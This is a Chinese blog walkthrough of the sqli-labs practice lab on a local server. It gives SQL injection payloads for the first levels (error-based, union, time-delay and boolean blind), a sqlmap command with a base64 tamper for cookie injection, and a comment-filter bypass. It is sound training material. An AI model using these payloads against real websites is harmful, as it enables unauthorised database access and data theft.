标签:bms image 报错 width 开始 desktop cat code ima
附上工具:
phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4
sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj
环境搭建之前写过,这里就不多说了,直接开始通关体验
1、http://127.0.0.1/sqli-labs-master/Less-1/?id=1 单引号型
报错型注入payload:
1‘ and 1=extractvalue(1,concat(0x7e,(select database())))--+
Union联合查询型注入payload:
0‘ union select 1,database(),3--+
时间延迟型注入payload:
1%27%20and%20sleep(5)--+
布尔型盲注payload:
1‘ and 1=1 --+
1‘ and 1=2 --+
2、http://127.0.0.1/sqli-labs-master/Less-2/?id=1
0%20union%20select%201,database(),3%20--+
21、cookie型注入
抓包,修改请求包内容
将内容copy到C:\Users\qiupan\Desktop\26.txt中,sqlmap中执行命令:
python.exe sqlmap.py -r C:\Users\qiupan\Desktop\26.txt --cookie "uname=YWRtaW4%3D" --technique E --dbms mysql --tamper "base64encode.py" --batch
22、过滤了注释符
使用and ‘1‘=‘1来闭合引号即可
23、
标签:bms image 报错 width 开始 desktop cat code ima
原文地址:http://www.cnblogs.com/peterpan0707007/p/7515450.html
